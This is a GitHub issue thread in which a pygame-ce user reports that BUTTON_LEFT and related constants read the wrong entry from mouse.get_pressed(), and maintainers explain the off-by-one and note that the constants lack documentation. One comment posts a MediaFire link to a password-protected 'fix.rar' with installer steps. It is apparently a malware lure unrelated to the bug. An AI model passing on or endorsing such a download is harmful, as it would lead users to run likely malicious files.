### ISSUE TITLE
Mouse button constants are wrong

### ISSUE THREAD

**Issue by pgvalle** [pygame-community/pygame-ce#3083]
**Environment:**

pygame-ce 2.5.1 (SDL 2.30.6, Python 3.12.5)
Platform:               Windows-10-10.0.19045-SP0
System:                 Windows
System Version:         10.0.19045
Processor:              AMD64 Family 21 Model 2 Stepping 0, AuthenticAMD       SSE2: Yes                                                                          AVX2: No NEON: No
Architecture:           Bits: 64bit     Linkage: WindowsPE

Python:                 CPython 3.12.5 (tags/v3.12.5:ff3bc82, Aug  6 2024, 20:45:27) [MSC v.1940 64 bit (AMD64)]
pygame version:         2.5.1
SDL versions:           Linked: 2.30.6  Compiled: 2.30.6
SDL Mixer versions:     Linked: 2.8.0   Compiled: 2.8.0
SDL Font versions:      Linked: 2.22.0  Compiled: 2.22.0
SDL Image versions:     Linked: 2.8.2   Compiled: 2.8.2
Freetype versions:      Linked: 2.11.1  Compiled: 2.11.1

Display Driver:         windows
Mixer Driver:           wasapi

**Current behavior:**

When i do `buttons = pygame.mouse.{get_pressed/get_just_pressed/get_just_released}()` and then buttons[pygame.BUTTON_LEFT], i actually get the state of the wheel button. But when i do `buttons[0]`, i get the state of the correct button.
This is also the case for `pygame.BUTTON_MIDDLE`. `buttons[pygame.BUTTON_MIDDLE]` returns the state of button right (the rightmost button, not the correct one).
`pygame.BUTTON_RIGHT` doesn't work. And probably it has to do with my mouse having only the 3 basic buttons.
The states themselves are correct, just the buttons are wrong.

**Note:** I confirmed the above behaviour in 2 distinct machines. The debug info in this issue is of my personal pc. The other machine is from where I work. Don't have access to it now.

My guess is that maybe the constants are offset by one??? I really have no idea y i searched for this and found nothing.

**Expected behavior:**

Doing `buttons = pygame.mouse.{get_pressed/get_just_pressed/get_just_released}()` and then `buttons[pygame.{BUTTON_CONSTANT}]` should return the state of the expected button.

**Screenshots**

Not applicable

**Steps to reproduce:**

1. installed pygame-ce 2.5.1 along with opencv-contrib-python and it's dependencies. Everything was installed in a virtual environment. No system packages.
2. Used the most basic pygame example

**Test code**

```
import pygame as pg

pg.init()

screen = pg.display.set_mode((500, 500))
running = True
while running:
  for event in pg.event.get():
    if event.type == pg.QUIT:
      running = False

  buttons = pg.mouse.get_pressed()
  if buttons[pg.BUTTON_LEFT]:
    print("hello I'm being pressd")

  screen.fill('black')
  pg.display.flip()

pg.quit()
```

**Stack trace/error output/other error logs**

Not applicable

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by pgvalle** [comment]
> afaik, the button constants are supposed to work with mouse events, where you check the event.button. to use the same constants on the result of the mouse functions, you have to do func()[CONSTANT-1]. maybe it should be noted in the docs.

Yeah i think it should. Like... that was dumb... Sorry. But really you don't need to offset key constants by -1. So i felt like it was wrong. Thanks for the attention and quick answer. God bless you bro!

**Comment by damusss** [comment]
don't worry! I also agree that it's a bit strange. I'll check the docs and will consider a note specifying it, thanks for pointing it out :)

**Comment by pgvalle** [comment]
:DDDD Do i close the issue tho?

**Comment by damusss** [comment]
Yeah I think I'm going to close it, feel free to open a new one if you have a new issue or you can join the discord server (much easier to get help/report problems) (invite link: https://discord.gg/gbuwY9Ga )

**Comment by Starbuck5** [comment]
> My guess is that maybe the constants are offset by one??? I really have no idea y i searched for this and found nothing.

I don't see anywhere in the docs where it says you should use constants to read the values. The docs specify the return value as a tuple where each index has a specified value.

As far as I'm concerned them working offset by one is a complete coincidence.

I think it's a bigger problem that the BUTTON_ constants seem to be completely undocumented.
